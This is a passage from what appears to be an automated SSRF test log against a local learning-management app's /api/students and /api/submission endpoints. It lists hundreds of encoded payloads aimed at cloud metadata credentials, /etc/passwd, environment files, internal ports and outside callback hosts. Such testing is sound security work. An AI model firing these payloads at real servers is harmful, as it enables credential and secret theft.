`http://localhost:4200/api/students?url=localhost%3A443` +- Testing: `http://localhost:4200/api/students?url=localhost%3A80` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/students?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/students?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/students?url=loopback` +- Testing: `http://localhost:4200/api/students?url=loopback%3A22` +- Testing: `http://localhost:4200/api/students?url=loopback%3A80` +- Testing: `http://localhost:4200/api/students?url=loopback%3A443` +- Testing: `http://localhost:4200/api/students?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/students?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/students?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/students?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/students?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/students?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/students?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/students?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/students?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/students?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/students?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/students?url=127.1%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/students?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/students?url=2130706433%2F` +- Testing: `http://localhost:4200/api/students?url=3232235521%2F` +- Testing: `http://localhost:4200/api/students?url=3232235777%2F` +- Testing: `http://localhost:4200/api/students?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/students?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/students?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/students?url=0%2F` +- Testing: `http://localhost:4200/api/students?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/submission +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/submission?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/submission?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/submission?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/submission?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/submission?url=127.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=0` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/submission?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/submission?url=127.127.127.127` +- Testing: `http://localhost:4200/api/submission?url=127.0.1.3` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.0` +- Testing: `http://localhost:4200/api/submission?url=2130706433` +- Testing: `http://localhost:4200/api/submission?url=017700000001` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001` +- Testing: `http://localhost:4200/api/submission?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/submission?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/submission?url=google.com.localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/submission?url=localtest.me` +- Testing: `http://localhost:4200/api/submission?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/submission?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/submission?url=2130706433%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235521%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235777%2F` +- Testing: `http://localhost:4200/api/submission?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/submission?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/submission?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/submission?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/submission?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/submission?url=0%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.1` +- Testing: `http://localhost:4200/api/submission?url=localtest.me` +- Testing: `http://localhost:4200/api/submission?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/submission?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/submission?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/submission?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/submission?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/submission?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.0.1.3` +- Testing: `http://localhost:4200/api/submission?url=0` +- Testing: `http://localhost:4200/api/submission?url=127.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.1` +- Testing: `http://localhost:4200/api/submission?url=localhost` +- Testing: `http://localhost:4200/api/submission?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/submission?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/submission?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/submission?url=7F000001` +- Testing: `http://localhost:4200/api/submission?url=2130706433` +- Testing: `http://localhost:4200/api/submission?url=6425673729` +- Testing: `http://localhost:4200/api/submission?url=127001` +- Testing: `http://localhost:4200/api/submission?url=127_0._0_1` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/submission?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/submission?url=localtest.me` +- Testing: `http://localhost:4200/api/submission?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/submission?url=127.127.127.127` +- Testing: `http://localhost:4200/api/submission?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/submission?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001` +- Testing: `http://localhost:4200/api/submission?url=017700000001` +- Testing: `http://localhost:4200/api/submission?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/submission?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/submission?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/submission?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/submission?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/submission?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254` +- Testing: `http://localhost:4200/api/submission?url=2852039166` +- Testing: `http://localhost:4200/api/submission?url=7147006462` +- Testing: `http://localhost:4200/api/submission?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/submission?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/submission?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/submission?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/submission?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/submission?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/submission?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/submission?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/submission?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/submission?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/submission?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/submission?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/submission?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/submission?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/submission?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/submission?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/submission?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.0` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/submission?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/submission?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/submission?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235521` +- Testing: `http://localhost:4200/api/submission?url=3232235777` +- Testing: `http://localhost:4200/api/submission?url=425.510.425.510` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/submission?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/submission?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/submission?url=instance-data` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A22` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A443` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A80` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8000` +- Testing: 